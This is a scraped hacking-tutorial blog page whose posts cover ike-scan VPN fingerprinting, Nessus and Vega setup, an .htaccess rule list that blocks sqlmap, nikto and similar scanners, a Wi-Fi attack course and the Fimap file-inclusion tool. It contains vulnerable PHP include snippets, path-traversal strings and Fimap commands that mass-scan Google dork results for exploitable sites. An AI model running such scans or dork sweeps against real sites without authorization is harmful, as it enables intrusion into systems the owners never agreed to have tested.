Penetration Testing VPN With Ike Scanner On Backtrack Part-1

Hi All As you all know these days many organisation using VPN Quite Actively so we will take a quick look on penetration testing Virtual Private Network Using Ike Scanner On Backtrack.<br /> So there is a myth on everyone mind that VPN Provide Full Protection Against Hacker (Means no hacker can hack :P )...so its never like that if there exist some loop hole than any attacker can hack network against any high security but VPN Does ensure some level of protection..still we will discuss some good and bad point in VPN connection.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizUrPP7oX9oxnTd3qf8yDiv4R_lyfiJ1BYV4ev41DXgh8K93rHKWvuhqLU_1kdtWvc5D1tMFJAwUJbOuUDe4fK85Y_uoCzTzCVBh2ajoj0wldUKQMxPeuiple-r0nO7aMuCx3w9wHDo3cz/s1600/vpn-service.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Penetration Testing VPN Network" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizUrPP7oX9oxnTd3qf8yDiv4R_lyfiJ1BYV4ev41DXgh8K93rHKWvuhqLU_1kdtWvc5D1tMFJAwUJbOuUDe4fK85Y_uoCzTzCVBh2ajoj0wldUKQMxPeuiple-r0nO7aMuCx3w9wHDo3cz/s620/vpn-service.jpg" width="550" /></a></div>The meaning of doing VPN penetration testing because it help the organisation to baseline (identify the loopholes that exist in the present implementation and modify the configuration accordingly to protect itself from known problems) its current VPN security posture, identify threats and weaknesses, and implement a new security policy that will mitigate risks. <br /> <br /> Penetration Testing A VPN Network Involves several phases those are :-<br /> <br /> <li>Scanning or identifying the VPN gateway.<br /> <li>Fingerprinting the VPN gateway for guessing implementation.<br /> <li>PSK mode assessment and PSK sniffing.<br /> <li>Offline PSK cracking.<br /> <li>Checking for default user accounts.<br /> <li>Testing the VPN gateway for vendor specific vulnerabilities.<br /> <br /> this first step you can easily do with tools like <a href="http://www.darksite.co.in/2013/08/nmap-commands-for-hackers-kali.html">nmap</a><br /> Example :-<br /> <blockquote>root@bt:~# <b>nmap -sU -p 500 172.16.21.200</b><br /> Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST<br /> Nmap scan report for 172.16.21.200<br /> Host is up (0.00036s latency).<br /> PORT STATE SERVICE<br /> 500/udp open isakmp<br /> MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)<br /> <br /> Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds<br /> </blockquote>Now as you now i have used -sU For Udp Scan And -p is for specifying port to be 500. <br /> <br /> <b>IKE Scan Tool :-</b><br /> Ike-scan is a simple but powerful command-line tool that is used to find and fingerprint VPN gateways. It sends specially crafted IKE packets to target gateways and enlists any IKE responses that are received. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with eight transforms inside it.<br /> <br /> Each transform contains a number of attributes like DES or 3DES as the encryption algorithm, SHA or MD5 as the integrity algorithm, a pre-shared key as the authentication type, Diffie-Hellman 1 or 2 as the key distribution algorithm and 28800 seconds as the lifetime.<br /> <br /> Initial VPN discovery with Ike-scan is as shown below:<br /> <blockquote>root@bt:~# ike-scan -M 172.16.21.200<br /> Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)<br /> 172.16.21.200 Main Mode Handshake returned<br /> HDR=(CKY-R=d90bf054d6b76401)<br /> SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)<br /> VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)<br /> <br /> Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify<br /> </blockquote>The -M shows each payload in a line, so that the output will be neat and easy to understand. The output can be any of the following:<br /> <br /> <li>0 returned handshake; 0 returned notify: This means the target is not an IPsec gateway.<br /> <li>1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable.<br /> <li>0 returned handshake; 1 returned notify: VPN gateways respond with a notify message when none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).<br /> In the example shown, the VPN gateway replies with one returned handshake and the acceptable transform set has these parameters:<br /> <blockquote>Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800<br /> <br /> Custom transform sets can be tried against the target with the <br /> "--trans" switch:<br /> <br /> --trans=(1=1,2=2,3=1,4=2)<br /> </blockquote>where 1=Encryption Algorithm, 2=Hash Algorithm, 3=Authentication Method, 4=Group Description, and 5=Group Type.<br /> <br /> Kindly refer to <a href="http://www.ietf.org/rfc/rfc2409.txt">RFC 2409</a> Appendix A for a complete understanding of transform set values. There are a number of other tools like ipsectrace, ipsecscan, etc., available for IPsec scanning, but undoubtedly Ike-scan is one of the best and a frequently updated tool.<br /> <br /> Vulnerability assessment tools like Nessus, Nexpose, etc, can be used to identify the vulnerabilities of VPN implementations. A full security audit on the target gateway with such types of tools will generate a detailed report with all identified problems and the mitigation steps available.<br /> <br /> Further penetration testing i will post on later tutorial plese leave your comment below if you have any query.

Penetration Testing VPN With Ike Scanner On Backtrack Part-1

Hi All As you all know these days many organisation using VPN Quite Actively so we will take a quick look on penetration testing Virtual Pri...

Read more »

Free Learn Wifi Security With Vivek Ramachandran ( Books | Video Tutorials & Concepts )

Hi everyone it really Feel great that Vivek RamaChandran Sir has done an awesome video series of wifi security which makes you clear on most of the concept related to wifi security .past few days i have a great interest on learn wifi security so i found wifi security by vivek sir and let me tells you this video series some contain some quality training material with live practicals and clear cut understanding.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix3ryC73Dtaype1CnlFnxSVKPruQfQlnBjSPDFCOH4J7gBQoavhrdXVvzpUu4OtNU9nJcviniS0Nwx2hFQQ5doLxEh3WVgpDNUPA1MjuYwmWPVgdDnHBg7-a2C_ETquuYu4f8z_dQyTw9Y/s1600/free+learn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="free download wifi hacking videos and books" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix3ryC73Dtaype1CnlFnxSVKPruQfQlnBjSPDFCOH4J7gBQoavhrdXVvzpUu4OtNU9nJcviniS0Nwx2hFQQ5doLxEh3WVgpDNUPA1MjuYwmWPVgdDnHBg7-a2C_ETquuYu4f8z_dQyTw9Y/s1600/free+learn.png" /></a></div><b>You must have seen our previous Post </b><br /> <br /> <a href="http://www.darksite.co.in/2013/05/free-download-backtrack-5-wireless.html">Free download BackTrack 5 Wireless Penetration Testing By Vivek Ramachandran</a> Which share free e book by vivek sir.<br /> <br /> <b>let me tell you about some contents about the video series:-</b><br /> <br /> It Contain fully practical with explanation.it is best for penetration testers, security enthusiasts and network administrators.<br /> This video series will take you through a journey in wireless LAN (in)security and penetration testing.it will also teach you very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications<br /> <br /> <b>A non-exhaustive list of topics to be taught includes:</b><br /> <br /> <li>Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs<br /> <li>Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, Understanding encryption based flaws (WEP,TKIP,CCMP)<br /> <li>Attacking the WLAN Infrastructure – Rogues Devices, Evil Twins, DoS Attacks, MITM, Wi-Fi Protected Setup<br /> <li>Advanced Enterprise Attacks – 802.1x, EAP, LEAP, PEAP, EAP-TTLS<br /> <li>Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe-Latte, Hirte, Ad-Hoc Networks and Viral SSIDs, WiFishing<br /> <li>Breaking into the Client – Metasploit, SET, Social Engineering<br /> <li>Enterprise Wi-Fi Worms, Backdoors and Botnets<br /> <br /> <b>About VivekRamachandran (Author of Book /Trainer):-<br /> </b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglZMgJRuFn50SEPF0pR85W8ojzJf5PxM8J3mRYGgW6ZLuwEob7n1QayR7bh7YUHAO5SaLOOyn7ailMDyAwMUX6lv3L5yHcx2cbdoEopj5VY8_YG35WO9H2tCP1Be0fK6-YsDZWjb2NxNlJ/s1600/vivek+sir.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="Vivek Ramachandran" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglZMgJRuFn50SEPF0pR85W8ojzJf5PxM8J3mRYGgW6ZLuwEob7n1QayR7bh7YUHAO5SaLOOyn7ailMDyAwMUX6lv3L5yHcx2cbdoEopj5VY8_YG35WO9H2tCP1Be0fK6-YsDZWjb2NxNlJ/s1600/vivek+sir.jpg" /></a></div>Vivek has been into Wireless security research since 2003 ,He was also one of the winners of Microsoft Security Shootout contest held in India among a reported 65,000 participants,his work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Blackhat USA and Abu Dhabi, Defcon, Hacktivity, Brucon, ClubHack, SecurityByte, SecurityZone, Nullcon, C0C0n etc.He is best known in the hacker community as the founder of SecurityTube.net where he routinely posts videos on Wi-Fi Security, Assembly Language, Exploitation Technique.<br /> <br /> i think you all security geeks knows him so no need to write more about him.<br /> <br /> <a href="http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso">Download All Free Video Tutorial</a> (iso File 4.2 GB)<br /> you can also see all video tutorial part wise <a href="http://www.securitytube.net/groups?operation=view&groupId=9">here</a><br /> <br /> TO start up with you need ALFA NETWORK AWUS036NH 2W USB Wireless N Adapte You can easily purchase from<a href="http://www.ebay.com/itm/ALFA-NETWORK-AWUS036NH-2W-USB-Wireless-N-Adapter-WiFi-b-g-N-2000mW-/400611594109?pt=US_USB_Wi_Fi_Adapters_Dongles&hash=item5d464fcf7d"> ebay</a>/amazon .You also need to <a href="http://www.darksite.co.in/2012/05/how-to-install-backtrack-5-r1-in-your.html">set up backtrack</a> on your laptop/pc(<a href="http://www.darksite.co.in/2012/08/how-to-install-vmware-tools-in-backtrack.html">vmweare/virtual box</a>) which i think very easy and i know even a kid can do it.<br /> <br /> So Even i have Started to learn wifi security gone upto 22+ videos and the whole video series contain 45+ Videos so have fun and special thanks to vivek sir _/\_ for making these videos and sharing it for free.

Free Learn Wifi Security With Vivek Ramachandran ( Books | Video Tutorials & Concepts )

Hi everyone it really Feel great that Vivek RamaChandran Sir has done an awesome video series of wifi security which makes you clear on most...

Read more »

How to Protect your website from web vulnerability Scanners

Hello here i come with a small trick but quite useful it can make your website safe from kiddie hackers :P. some time actually new born hackers do use various web scanners like Acunetix, nessus, Openvas & other scanner available at backtrack.so being a web sec guy how can you protect your website from such automated scanner the code is very simple all you need to do is Just add the below given codes to your .htaccess file . <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmz1A7mBmj7rW5bKf_y_p_VuRsvAZxqgEXTuWPfRPSmkE3KNus8cDAGaR7hc2ZherD6SN_BKZsfGmLUv8PBabw9t_DqsHWTxP4FG767HUtjamAbAv6EFNrPla2vtMHp_zLOW2n4KOtG4yA/s1600/hacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="protect from web vulnerability scanners" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmz1A7mBmj7rW5bKf_y_p_VuRsvAZxqgEXTuWPfRPSmkE3KNus8cDAGaR7hc2ZherD6SN_BKZsfGmLUv8PBabw9t_DqsHWTxP4FG767HUtjamAbAv6EFNrPla2vtMHp_zLOW2n4KOtG4yA/s620/hacker.png" /></a></div><blockquote>RewriteEngine On<br /> <�IfModule mod_rewrite.c><br /> RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} SF [OR]<br /> RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]<br /> RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]<br /> RewriteCond %{HTTP:Acunetix-Product} ^WVS<br /> RewriteRule ^.* http://127.0.0.1/ [R=301,L]<br /> <�/�IfModule><br /> <font color="red">(Please Remove � On Original Code)</font><br /> </blockquote>after adding this content to .htaccess save it now.this is just a counter step taken to stay away from web scanners. hope you like this post do share ,comments ,like and thank you :) .

How to Protect your website from web vulnerability Scanners

Hello here i come with a small trick but quite useful it can make your website safe from kiddie hackers :P. some time actually new born hack...

Read more »

installing Nessus Scanner For Network Vulnerability in Backtrack

uhh...hi everyone after a long days i have started posting tut so lets get started today we will be installing nessus scanner on backtrack and using it.<a href="http://www.darksite.co.in/2012/05/how-to-install-and-configure-best.html">Check my long old post :D </a><br /> <h3>What is Nessus is For?</h3><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX3IS68Or44IhgjeaSeH9KDV4akvVyBTXQzpAuoi4sKl0cM5t7iU1SOBS6PnphfKVGfzSgK8wonGE9oxaLQ22-coIL87Hk15dlyokzLcWK0i9R3sev4NS7LMsMemohSOmzHthBrGreO7Ki/s1600/nessus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX3IS68Or44IhgjeaSeH9KDV4akvVyBTXQzpAuoi4sKl0cM5t7iU1SOBS6PnphfKVGfzSgK8wonGE9oxaLQ22-coIL87Hk15dlyokzLcWK0i9R3sev4NS7LMsMemohSOmzHthBrGreO7Ki/s320/nessus.jpg" /></a></div>Nessus is a network vulnerability scanning program thats give you power to find you all the Vulnerability present on the network/host . It is free for personal use. Its can detect vulnerabilities on the systems. Nessus is the most popular vulnerability scanner in the computer security. Nessus allows scans for vulnerabilities, Misconfiguration, default passwords / common passwords / blank passwords on some system accounts, etc. You can use Nessus to scan your system and patch the vulnerability. If you want install Nessus on Backtrack 5 R3 first thing to do is download it from <a href="http://www.tenable.com/products/nessus/">http://www.tenable.com/products/nessus/</a><br /> <br /> So we will discuss how we can install it online (if you are having internet connection)<br /> Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation.<br /> Here are the commands to install nessus : open terminal and type(if you don't know :P)<br /> <br /> <b>apt-get install nessus</b><br /> <br /> After install it, create an account with adduser command like this<br /> <br /> <b>/opt/nessus/sbin/nessus-adduser</b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi096BdbvQ3tivzStOhO2i-NKqbUuGFAai-CU-88JyLpJh8W6ITIIcjIbeJ3I1Rr8CMn7ov-mPNM5QUn4xSaz8soNJvL27tfvLnjd_AYErs3c38gKLme8fXLtlYIeB7ibEayf0b6jXF_3SF/s1600/BT5-Adding-User.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi096BdbvQ3tivzStOhO2i-NKqbUuGFAai-CU-88JyLpJh8W6ITIIcjIbeJ3I1Rr8CMn7ov-mPNM5QUn4xSaz8soNJvL27tfvLnjd_AYErs3c38gKLme8fXLtlYIeB7ibEayf0b6jXF_3SF/s400/BT5-Adding-User.png" /></a></div>After you've entered a username, the nessus-adduser program asks you if the user account should have admin privileges or not. It is recommended that the initial user account have admin privileges so you can use the Nessus Web Interface to create subsequent accounts. The only difference between a Nessus admin user and a regular user is the ability to create user accounts.<br /> <h3>Registering Account For Nessus</h3><br /> Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessus activation code. If you wish to purchase a ProfessionalFeed, you can visit the <a href="https://store.tenable.com/">Tenable Store</a>. If you are using Nessus at home or wish to evaluate Nessus, you can <a href="http://www.tenable.com/products/nessus/nessus-homefeed">register a HomeFeed</a>. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.<br /> <br /> After registering they will send you activation code to your email. After you get the key, run this command, fill change xxxx-xxxx-xxxx-xxxx-xxxx with your key<br /> <br /> <b>/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx</b><br /> <br /> It will take some time because plugin is being updated. After the update complete, run your Nessus<br /> <br /> <b>/etc/init.d/nessusd start</b><br /> <br /> Then <b>open your browser and type</b> this in the URL of the browser<br /> <br /> <b>https://localhost:8834/</b><br /> (You can also access the Nessus Web Interface remotely/outside by using the IP address assigned to BackTrack 5 (e.g. https://192.168.37.210:8834/).)<br /> <br /> Nessus will run on the secure channel https and on the port number 8834.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaKnRnPSJ3-PSC_CjQMlJ9Rj7OIj503WC3gwmGfzTY_wVcOo2eKP8Z8JSG_VpK7dfKW3pi3IDsusTRVsHl3HMaPUuk8N976dkf-i-IjCUhE2Z3qIv4Mhs3wbmQNXH3pqJQ89SVYYJdZEIa/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaKnRnPSJ3-PSC_CjQMlJ9Rj7OIj503WC3gwmGfzTY_wVcOo2eKP8Z8JSG_VpK7dfKW3pi3IDsusTRVsHl3HMaPUuk8N976dkf-i-IjCUhE2Z3qIv4Mhs3wbmQNXH3pqJQ89SVYYJdZEIa/s320/2.png" /></a></div><br /> Now try and use Nessus for your own risk :-D..<br /> <br /> Next tutorial i will post how to scan a host and get a report using nessus scanner.if you need anyhelp on any tools do post as a comment i will definitely reply on you also i also encourage everyone to use Backtrack if you wann learn more on security things<br /> .

installing Nessus Scanner For Network Vulnerability in Backtrack

uhh...hi everyone after a long days i have started posting tut so lets get started today we will be installing nessus scanner on backtrack a...

Read more »

Scanning For Web Vulnerability Using Vega Scanner On Backtrack | kali

hi everyone this is one more post on another web vulnerability scanner tool.so this time we will be discussing more about a tool known as Vega.this is very simple tool to use as well as detect some quality (High) vulnerability... <br /> <br /> <b>About Vega : </b><br /> Vega is an open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. <br /> Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection.Vega can be extended using a powerful API in the language of the web: Javascript. <br /> Vega was developed by Subgraph.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrmWhadJGWeN4yhX6Tj1n0y_1A7QltEthu40Im0UxMd65Luh_t3-M01LU-zFN3po4LOq7X_-RumrpgHdp_7nh0ks0hzKH9gIBhj5dJxNpvI41W2ht9zp8j5sR-A0EvUt5nkw4SI6Uc8-th/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrmWhadJGWeN4yhX6Tj1n0y_1A7QltEthu40Im0UxMd65Luh_t3-M01LU-zFN3po4LOq7X_-RumrpgHdp_7nh0ks0hzKH9gIBhj5dJxNpvI41W2ht9zp8j5sR-A0EvUt5nkw4SI6Uc8-th/s700/1.png" width="560" /></a></div><br /> Lets scan for a website for vulnerability as you can see you directly browse this tool on backtrack by following path.<br /> <b><br /> Bancktrack>vulnerability assessment >web application assessment >web vulnerability scanner>vega</b><br /> of course you can easily browse this by some command on terminal<br /> <b>#cd /pentest/web/vega <br /> then ./Vega</b><br /> Now on the top select scan option since it open graphical user interface of this scanner.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6vp-8TL3qRYmT0n4dw4TY4fcVpnp_byod3-v4VGCLChAf450fEdiLRGmhVd1Ma95ySqoRl1D8yYI-V4zplvIUFzELz7LROIlXRMTLyXGvLctMFXOjDqahXrsiPpWQO2CSBy8hyyVwtij/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6vp-8TL3qRYmT0n4dw4TY4fcVpnp_byod3-v4VGCLChAf450fEdiLRGmhVd1Ma95ySqoRl1D8yYI-V4zplvIUFzELz7LROIlXRMTLyXGvLctMFXOjDqahXrsiPpWQO2CSBy8hyyVwtij/s640/2.png" width="560" /></a></div><br /> it will ask you for url to scan and below option which you can mark for a scan.<br /> <br /> next you can even set the login cookie if your site need any credentials for access.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidoqEKAgqyy8JZ5BWdv5RcNiYAk-xNBkXcHCd5FUeUxmXT289HwyRagT5zKEvaLwUs5LsVoC-T-qLLiubv1so0KV0DJpjuDdFajz-ElqOau-i5p7oldoRYibnUlfGu_LsHK2z-R58uGNhk/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidoqEKAgqyy8JZ5BWdv5RcNiYAk-xNBkXcHCd5FUeUxmXT289HwyRagT5zKEvaLwUs5LsVoC-T-qLLiubv1so0KV0DJpjuDdFajz-ElqOau-i5p7oldoRYibnUlfGu_LsHK2z-R58uGNhk/s600/3.png" width="560" /></a></div><br /> next click on finish it will scan your website quickly.showing below the vulnerability count as well as url.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnm_FiuqiG-DV-6Kq2StEz3kLFSPx8mk-HYsWXWWFDJAGaZBq3brfJ-v9NBoZXb_pxRwmLUXWPh0B3w0ZTPVb43ekgytbkOcSuUSzs_d4GHxD6Q82nNk3CaRWBBoHBYKS4Ew0fn3iSLVKy/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnm_FiuqiG-DV-6Kq2StEz3kLFSPx8mk-HYsWXWWFDJAGaZBq3brfJ-v9NBoZXb_pxRwmLUXWPh0B3w0ZTPVb43ekgytbkOcSuUSzs_d4GHxD6Q82nNk3CaRWBBoHBYKS4Ew0fn3iSLVKy/s600/4.png" width="560" /></a></div><br /> Next you just need to re-verify /cross check those vuln url simply by following those url and exploitation.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitMjF9FIefJ_ZCQMWBSti6fcjdtgiemqxgqY29GrnzmavlkBH2hnO_niJLjfll46SftsjsBxDJ55oHoFsvr6HGUrK7cedEXs9x_cnyJJcrrETjR1qqYBIvCjLXaevyWAJalUH7oeqqaCj3/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitMjF9FIefJ_ZCQMWBSti6fcjdtgiemqxgqY29GrnzmavlkBH2hnO_niJLjfll46SftsjsBxDJ55oHoFsvr6HGUrK7cedEXs9x_cnyJJcrrETjR1qqYBIvCjLXaevyWAJalUH7oeqqaCj3/s600/5.png" width="560" /></a></div>you can also prepare reports easily for showing to your boss ;).<br /> have fun ...

Scanning For Web Vulnerability Using Vega Scanner On Backtrack | kali

hi everyone this is one more post on another web vulnerability scanner tool.so this time we will be discussing more about a tool known as Ve...

Read more »

Best LFI | RFI Scanner in BackTrack Fimap-Exploitation Tool

Hi everyone this is a one more post on web scanner that is actually best on its Business For LFI (Local File Inclusion) And Remote File Inclusion .Though there are various tools available on backtrack but <b>Fimap </b> is one of the finest tool for detecting LFI and RFI on target website and exploiting it. <br /> <b><br /> About Fimap Tool </b><br /> <br /> It is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap is another tool which is best for getting LFI and RFI Out of a web app.it is still under development but works very fine.<br /> <b><br /> Features and Functions</b><br /> <br /> <li>Automatically find the root of the file system<br /> <li>Detect default files outside of the web folder<br /> <li>Attempts to detect passwords inside the files<br /> <li>Supports basic authentication<br /> <li>Can use null byte to bypass some controls<br /> <li>Writes a report of the scan to a file<br /> <li>Add your own payloads and patches to the config.py file.<br /> <li>Has a Harvest mode which can collect URLs from a given domain for later pentesting.<br /> <li>All commands will now be send base64 encoded. So you can use quotes as much as you want.<br /> <li>php://input detection is now 100% reliable.<br /> <li>You can now define a POST string for relative and absolute files in the config.py.<br /> <li>TTL implemented. You can define it with “—ttl “. Default is 30 seconds.<br /> <li>Experimental HTTP Proxy support. You can define a HTTP(s) proxy with “—http-proxy localhost:8080″.<br /> <li>Googlescanner can now skip the first X pages. Use “—skip-pages X”.<br /> <li>Lots of bugfixes and additional regular expressions.<br /> <li>Harvest mode which can collect URLs from a given domain for later pentesting. <br /> <li>Can handle directories in RFI mode like:<br /> <blockquote><*? include (*$*_GET["inc"] . "/content/index.html"); *?**><br /> <***? include (*$*_GET["inc"] . "_lang/index.html"); *?**><br /> <b>(Remove * symbol)</b><br /> </blockquote>where Null-Byte is not possible.<br /> <li>You always define absolute path names in the configs. No monkey like redundant pathes like:<br /> ../etc/passwd<br /> ../../etc/passwd<br /> ../../../etc/passwd<br /> <li> Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. <b>BlindMode</b><br /> <li>Test and exploit multiple bugs:<br /> include()<br /> include_once()<br /> require()<br /> require_once()<br /> <b><br /> Working With Fimap</b><br /> <br /> Scan a single URL for FI errors<br /> <br /> <b>#./fimap -u http://www.example.com/test.php?file=bang&id=23</b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTvcm0Tuh8WRPu93-wqSHrOGFAd8qymRm3gdJR-Vx7EPCRcjAAS6pRH49SthsKsE41eXNNRHX2y_TDN4siRlETHbYwWbv9ODVRIz26RIV_XOTmjGix0cwhgSU555NrLHbYTsfbqb1tSLTU/s1600/scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="scanning for lfi/rfi" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTvcm0Tuh8WRPu93-wqSHrOGFAd8qymRm3gdJR-Vx7EPCRcjAAS6pRH49SthsKsE41eXNNRHX2y_TDN4siRlETHbYwWbv9ODVRIz26RIV_XOTmjGix0cwhgSU555NrLHbYTsfbqb1tSLTU/s600/scan.png" width="550" /></a></div><br /> Scan Google search results for FI errors<br /> <br /> <b>#./fimap.py -g -q inurl:index.php<br /> </b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipt6b-is1s8_rk4qMWUbrzXIKmgOCbJMI3zgeiMWpOWqhXThlQA39JsYh3SSnqVr1aM6hUJOXwMjz44WbqJl48XCbpLnwS4XaFGJsD3C4bjE4BszLElRgJlf8j8G8tnuP_4gysmhtdK4sN/s1600/123.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="web scanner" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipt6b-is1s8_rk4qMWUbrzXIKmgOCbJMI3zgeiMWpOWqhXThlQA39JsYh3SSnqVr1aM6hUJOXwMjz44WbqJl48XCbpLnwS4XaFGJsD3C4bjE4BszLElRgJlf8j8G8tnuP_4gysmhtdK4sN/s620/123.png" width="550" /></a></div><br /> Harvest all links of a webpage<br /> <br /> <b>#./fimap.py –H -u http://example.com–d 3 –w /tmp/urllist<br /> </b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfDpXzst5Prsb2dUlqILHkT2Ha-hYso_kh-_c9pMx5lWoaHogd1dNxQc_uBfIMnSDBqlkNMe7h5sssnFIX7qxIys05TScm3w5z5OubDOZOotTqHVzftq9klGolJ2b-FHD5RT3PP5q4EQlB/s1600/1233.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="best web scanner" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfDpXzst5Prsb2dUlqILHkT2Ha-hYso_kh-_c9pMx5lWoaHogd1dNxQc_uBfIMnSDBqlkNMe7h5sssnFIX7qxIys05TScm3w5z5OubDOZOotTqHVzftq9klGolJ2b-FHD5RT3PP5q4EQlB/s620/1233.png" width="550" /></a></div><br /> <li>-m is for mass scanning<br /> <li>-l is for list<br /> <li>Scan websites using google dorks<br /> <li>.fimap.py -g -q ‘inurl:index.php’<br /> <li>-g for searching from google<br /> <li>-q stands for the query which is to be searched in google.<br /> <br /> <b><br /> Requirements</b><br /> <br /> Needs: Python >= 